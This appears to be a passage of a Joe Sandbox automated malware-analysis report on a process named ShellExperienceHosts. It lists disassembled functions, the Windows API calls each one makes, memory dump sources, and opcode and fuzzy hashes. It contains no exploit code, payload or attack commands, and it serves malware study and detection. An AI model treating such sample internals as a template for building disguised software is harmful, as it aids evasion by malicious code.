Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Process32$ByteCharCloseCreateFirstHandleMultiNextSnapshotToolhelp32Wide
String ID:
API String ID: 4013288513-0
Opcode ID: 6a012f1e421deadfd1d3f040e6f5a566c3c2e33b6b19ff51c8d2a507a8beda45
Instruction ID: f6f7d26745daaaa9c9f2e61fcb46356ffb92a40f836acfe543468dd61d66028b
Opcode Fuzzy Hash: 6a012f1e421deadfd1d3f040e6f5a566c3c2e33b6b19ff51c8d2a507a8beda45
Instruction Fuzzy Hash: 2671F071904608AFDB04CFA4CC98BEEB7B9EF45314F244358F415BBA81D770AA89CB91

Function 100032E0 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 100032F1
Sleep.KERNEL32(00000258), ref: 100032FE
InterlockedExchange.KERNEL32(?,00000000), ref: 10003306
WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003312
WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000331A
Sleep.KERNEL32(0000012C), ref: 1000332B

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
String ID:
API String ID: 3137405945-0
Opcode ID: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
Instruction ID: f89297930b1253133b9af3f62c08b225611c8876bcc0692efb07df5bac526d50
Opcode Fuzzy Hash: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
Instruction Fuzzy Hash: 65F08971104314AFD610DBE9CCC4D46F3B8AF89331B144709F221872D0CAB1E8018BA0

Function 032D6690 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 032D669B
CoCreateInstance.OLE32(032F46FC,00000000,00000001,032F471C,?,?,?,?,?,?,?,?,?,?,032D588A), ref: 032D66B2
SysFreeString.OLEAUT32(?), ref: 032D674C
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,032D588A), ref: 032D677D

Strings

FriendlyName, xrefs: 032D673B

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CreateFreeInitializeInstanceStringUninitialize
String ID: FriendlyName
API String ID: 841178590-3623505368
Opcode ID: add325a023b1550563268848972a14c3cf68cd8e20fd9aa4de7abf7cee7503a3
Instruction ID: 15516dc99365ac9abc6054be4dd88275f70341f2098b076db4d0ca587435b6cc
Opcode Fuzzy Hash: add325a023b1550563268848972a14c3cf68cd8e20fd9aa4de7abf7cee7503a3
Instruction Fuzzy Hash: BD315E7971020AAFDB00DB99DC80EAEB7B9EFC9714F148598F604E7254D771E941CB60

Function 032DF707 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 032DF721

Part of subcall function 032DF673: __FF_MSGBANNER.LIBCMT ref: 032DF68C
Part of subcall function 032DF673: __NMSG_WRITE.LIBCMT ref: 032DF693
Part of subcall function 032DF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,032E4500,00000000,00000001,00000000,?,032E8DE6,00000018,032F6448,0000000C,032E8E76), ref: 032DF6B8

std::exception::exception.LIBCMT ref: 032DF756
std::exception::exception.LIBCMT ref: 032DF770
__CxxThrowException@8.LIBCMT ref: 032DF781

Strings

bad allocation, xrefs: 032DF74F

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: 72ac4df9fba3faa0d99b96217616b967723af74590f5d03f751c89d53e05d0b7
Instruction ID: c9861086168bcdf9ce507d211a101491df697c8ea801b2aba97e017b5cfd8aa9
Opcode Fuzzy Hash: 72ac4df9fba3faa0d99b96217616b967723af74590f5d03f751c89d53e05d0b7
Instruction Fuzzy Hash: 70F0F97493030ABEDB04FB14EF259AEBB68DB05614F544039D912DA195DBB096C08B98

Function 6CAF4E4E Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6CAF4E8B
dllmain_crt_dispatch.LIBCMT ref: 6CAF4EA2
dllmain_raw.LIBCMT ref: 6CAF4EEA
dllmain_crt_dispatch.LIBCMT ref: 6CAF4EFD
dllmain_raw.LIBCMT ref: 6CAF4F10

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 87d6668998e8ae81556473699b5f12d7605864fd16e3899bafc433bc7c80824a
Instruction ID: 02e2318c990886c9dc8fd843224d53f2ccf29841092da98605be79ba9e531d15
Opcode Fuzzy Hash: 87d6668998e8ae81556473699b5f12d7605864fd16e3899bafc433bc7c80824a
Instruction Fuzzy Hash: 16219572D05215AFEB228E55DF40EEF3A79EB81A98F058115F83857B14D7318D878B90

Function 10002D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10002D3C
CancelIo.KERNEL32(?), ref: 10002D46
InterlockedExchange.KERNEL32(00000000,00000000), ref: 10002D4F
closesocket.WS2_32(?), ref: 10002D59
SetEvent.KERNEL32(00000001), ref: 10002D63

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
Instruction ID: c3dd280d0a222891198d8956340d5cd90ea8efbda93af296f9b36197db09124c
Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
Instruction Fuzzy Hash: 95F04F75100710EFE320DF94CC89F5677B8FB49B12F148659F6829B690C7B1F9048BA0

Function 6C9CE264 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Shell32,?,?,6C9A1104,YSS.AppID.NoVersion,00000000,?,Function_00180400,000000FF), ref: 6C9CE26F
GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 6C9CE280

Strings

Shell32, xrefs: 6C9CE268
SetCurrentProcessExplicitAppUserModelID, xrefs: 6C9CE27A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetCurrentProcessExplicitAppUserModelID$Shell32
API String ID: 1646373207-2658420654
Opcode ID: 97589f722ebaef8726efc9e6a960c9323fb20a653381487127c94c702ce697e3
Instruction ID: 822cd606f34ade16ddf213975f78435960d3fc92f0810bd7c2dd027de45687d7
Opcode Fuzzy Hash: 97589f722ebaef8726efc9e6a960c9323fb20a653381487127c94c702ce697e3
Instruction Fuzzy Hash: 98E04F757017A867CB245B65A80CD5E7FADEE86665700052AF90E83A00CB35D800CAE5

Function 6C9DF8C4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6C9DF921
VerSetConditionMask.KERNEL32(00000000), ref: 6C9DF929
VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C9DF93A
GetSystemMetrics.USER32(00001000), ref: 6C9DF94B

Part of subcall function 6C9E037C: __EH_prolog3.LIBCMT ref: 6C9E0383
Part of subcall function 6C9E037C: GetSysColor.USER32(00000016), ref: 6C9E038C
Part of subcall function 6C9E037C: GetSysColor.USER32(0000000F), ref: 6C9E039F
Part of subcall function 6C9E037C: GetSysColor.USER32(00000015), ref: 6C9E03B6
Part of subcall function 6C9E037C: GetSysColor.USER32(0000000F), ref: 6C9E03C2
Part of subcall function 6C9E037C: GetDeviceCaps.GDI32(?,0000000C), ref: 6C9E03EA
Part of subcall function 6C9E037C: GetSysColor.USER32(0000000F), ref: 6C9E03F8
Part of subcall function 6C9E037C: GetSysColor.USER32(00000010), ref: 6C9E0406
Part of subcall function 6C9E037C: GetSysColor.USER32(00000015), ref: 6C9E0414
Part of subcall function 6C9E037C: GetSysColor.USER32(00000016), ref: 6C9E0422
Part of subcall function 6C9E037C: GetSysColor.USER32(00000014), ref: 6C9E0430
Part of subcall function 6C9E037C: GetSysColor.USER32(00000012), ref: 6C9E043E
Part of subcall function 6C9E037C: GetSysColor.USER32(00000011), ref: 6C9E044C
Part of subcall function 6C9E037C: GetSysColor.USER32(00000006), ref: 6C9E0457
Part of subcall function 6C9E037C: GetSysColor.USER32(0000000D), ref: 6C9E0462
Part of subcall function 6C9E037C: GetSysColor.USER32(0000000E), ref: 6C9E046D
Part of subcall function 6C9E037C: GetSysColor.USER32(00000005), ref: 6C9E0478
Part of subcall function 6C9E037C: GetSysColor.USER32(00000008), ref: 6C9E0486
Part of subcall function 6C9E037C: GetSysColor.USER32(00000009), ref: 6C9E0491
Part of subcall function 6C9E037C: GetSysColor.USER32(00000007), ref: 6C9E049C
Part of subcall function 6C9E037C: GetSysColor.USER32(00000002), ref: 6C9E04A7
Part of subcall function 6C9E037C: GetSysColor.USER32(00000003), ref: 6C9E04B2
Part of subcall function 6C9E037C: GetSysColor.USER32(0000001B), ref: 6C9E04C0
Part of subcall function 6C9E037C: GetSysColor.USER32(0000001C), ref: 6C9E04CE
Part of subcall function 6C9E037C: GetSysColor.USER32(0000000A), ref: 6C9E04DC

Part of subcall function 6C9DFE5D: __EH_prolog3_GS.LIBCMT ref: 6C9DFE67
Part of subcall function 6C9DFE5D: GetDeviceCaps.GDI32(?,00000058), ref: 6C9DFE87
Part of subcall function 6C9DFE5D: DeleteObject.GDI32(00000000), ref: 6C9DFEE3
Part of subcall function 6C9DFE5D: DeleteObject.GDI32(00000000), ref: 6C9DFF01
Part of subcall function 6C9DFE5D: DeleteObject.GDI32(00000000), ref: 6C9DFF1F
Part of subcall function 6C9DFE5D: DeleteObject.GDI32(00000000), ref: 6C9DFF3D
Part of subcall function 6C9DFE5D: DeleteObject.GDI32(00000000), ref: 6C9DFF5B
Part of subcall function 6C9DFE5D: DeleteObject.GDI32(00000000), ref: 6C9DFF79
Part of subcall function 6C9DFE5D: DeleteObject.GDI32(00000000), ref: 6C9DFF97
Part of subcall function 6C9DFE5D: DeleteObject.GDI32(00000000), ref: 6C9DFFB5

Part of subcall function 6C9DFA30: GetSystemMetrics.USER32(00000031), ref: 6C9DFA3E
Part of subcall function 6C9DFA30: GetSystemMetrics.USER32(00000032), ref: 6C9DFA4C
Part of subcall function 6C9DFA30: SetRectEmpty.USER32(?), ref: 6C9DFA5F
Part of subcall function 6C9DFA30: EnumDisplayMonitors.USER32(00000000,00000000,6C9DF846,?,?,00000000,6C9DF96C), ref: 6C9DFA6F
Part of subcall function 6C9DFA30: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C9DFA7E
Part of subcall function 6C9DFA30: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C9DFAAB
Part of subcall function 6C9DFA30: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C9DFABF
Part of subcall function 6C9DFA30: SystemParametersInfoW.USER32 ref: 6C9DFAE5

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Color$DeleteObject$System$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
String ID:
API String ID: 2442922003-0
Opcode ID: 659e550379131c8dcc93be0e5bd91deac5c5efb9b5822e5ca6d1c90bf21c81dd
Instruction ID: b3367e04ea316c97388bc6c03554d71b978fe4266b152a16b875eb7eb08c6091
Opcode Fuzzy Hash: 659e550379131c8dcc93be0e5bd91deac5c5efb9b5822e5ca6d1c90bf21c81dd
Instruction Fuzzy Hash: 6F11A7B0A00318ABDB219F759C86FEF77FCEF89708F00445DA11597280CBB05A498B90

Function 10006F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 10006F31

Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8

std::exception::exception.LIBCMT ref: 10006F66
std::exception::exception.LIBCMT ref: 10006F80
__CxxThrowException@8.LIBCMT ref: 10006F91

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
Instruction ID: bc3bc25b656f4220cb3330c80879dd0d2e796a6a37b49e0188f73f67aa49fa4f
Opcode Fuzzy Hash: d1b741ba0380379decb7d1b22a74743c7f5a7046d8fc72408544d039aac17dad
Instruction Fuzzy Hash: C5F02D3980425BAAFB00DBA4DC91AAD3AE7EB496C0F300025F4149E0D5DFB1EBC0C740

Function 032D3160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 032D316B
InterlockedExchange.KERNEL32(?,00000001), ref: 032D3183
GetCurrentThreadId.KERNEL32 ref: 032D322F

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CurrentThread$ExchangeInterlocked
String ID:
API String ID: 4033114805-0
Opcode ID: a3005f082ded4eae7f50f27ec44f24f624c8de6240fc56bbe4772a60a02cb258
Instruction ID: 4f8bb94ca9da1b2a875f3e5cc3e7ef1bb7ac546813e71ee2e3c5bd7bf05c74df
Opcode Fuzzy Hash: a3005f082ded4eae7f50f27ec44f24f624c8de6240fc56bbe4772a60a02cb258
Instruction Fuzzy Hash: 9A31AB78220603EFC718DF69C884A66B3E8FF44B14B10C52CEA1ACB615D771F882CB91

Function 032D11B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 032D11E9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 032D1226
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 032D1255

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: df2471b507e42c6d4545cf1b96dbf678e588aadb7d185627d4be9b39dbbf6b3b
Instruction ID: 8c6140acd66b0c0bb13dad1ee0d60a126465a5108b9272c3ef0a3359d5df669f
Opcode Fuzzy Hash: df2471b507e42c6d4545cf1b96dbf678e588aadb7d185627d4be9b39dbbf6b3b
Instruction Fuzzy Hash: A121D471A10309AFDB50DFADE845B6EFBF8EF40B15F0085ADE849E2A40E670B8508700

Function 100011B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 100011E9
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 10001226
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001255

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
Instruction ID: 68b1d39f7c788df30121c4cd9fa650265093b70568a06a1b8131812e88253602
Opcode Fuzzy Hash: 7c8a02711727f2d10f68a554ded2e2394815aae473f82a087a4a6f69535250f3
Instruction Fuzzy Hash: EB21D170A00709AFEB14DFA9DC85B9EFBF4FF44745F00C5ADE949E2644EA30A8108790

Function 032D1100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 032D112F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 032D115F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 032D1192

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: bc6689b45fb8d375d4727af79b4c46a48ee095786909b03d0b5f45ce9cd18dc0
Instruction ID: e2d45ae0fbba2b9d05993909597ce93cb3e580816fbdd343b095475f83b0249a
Opcode Fuzzy Hash: bc6689b45fb8d375d4727af79b4c46a48ee095786909b03d0b5f45ce9cd18dc0
Instruction Fuzzy Hash: 3511D370A10309AFDB50DFA9E886B6EFBF8EF04B05F0084A9ED59E2640E670E850C710

Function 10001100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 1000112F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 1000115F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 10001192

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Virtual$AllocFree__floor_pentium4
String ID:
API String ID: 2605973128-0
Opcode ID: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
Instruction ID: ccfbffdb8cfccccbf267e057733e19453fb850e329b77576dd89ff791b5dae30
Opcode Fuzzy Hash: 9a9a6dbc4d50d479c69aa6d6b662a424f68bc22565965440325d2e32c173b15c
Instruction Fuzzy Hash: 77119670A00709ABEB14DFA9DC86B9EF7F4FF04745F008569EE59D2240E671A9148750

Function 032D9DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 032D9E04
GdipDisposeImage.GDIPLUS(?), ref: 032D9E18
GdipDisposeImage.GDIPLUS(?), ref: 032D9E3B

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Gdip$DisposeImage$BitmapCreateFromStream
String ID:
API String ID: 800915452-0
Opcode ID: fa6a2e9c66bc8dbb0f4b95d9eda4af0de53f18da5f9daf7da8dd06037bd36f90
Instruction ID: 23e82da5f8a18e5a2c37c141392bf80f62cb8338737c3fa2052869b33f227c5b
Opcode Fuzzy Hash: fa6a2e9c66bc8dbb0f4b95d9eda4af0de53f18da5f9daf7da8dd06037bd36f90
Instruction Fuzzy Hash: 4BF0A47591022DEB8B10EF94E8488AEF7B8EB45611B00855AFC05AB344D7304B95CBD0

Function 032D9AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(032FFB64), ref: 032D9ADC
GdiplusStartup.GDIPLUS(032FFB60,?,?), ref: 032D9B15
LeaveCriticalSection.KERNEL32(032FFB64), ref: 032D9B26

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterGdiplusLeaveStartup
String ID:
API String ID: 389129658-0
Opcode ID: 2eaf303c75e7ec75750ca28aedafe4ee88ea2c159dff8cc8431254e16f3d044e
Instruction ID: 5af0d0749f1fb93dfdfda1192c9217b4b36c50d255702c38d1982a6ee3f47770
Opcode Fuzzy Hash: 2eaf303c75e7ec75750ca28aedafe4ee88ea2c159dff8cc8431254e16f3d044e
Instruction Fuzzy Hash: 21F06D7594130AAFDB00EFD5E96A7AAB7B8F709315F4081A9E90452281D7B24588CFA1

Function 6CB14747 Relevance: 4.5, APIs: 3, Instructions: 17fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(6CB05252,?,6CB05252,00000000), ref: 6CB1474F
GetLastError.KERNEL32(?,6CB05252,00000000), ref: 6CB14759
__dosmaperr.LIBCMT ref: 6CB14760

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID:
API String ID: 1545401867-0
Opcode ID: 3815a4e8fa009542869fcd1f6cf16de927b9201fa06b7900cf6d6714aa1bfa1c
Instruction ID: b57aa6d9eef4fbdeb706cd2c90620683f168356d4e6842329ec31d861c7dae41
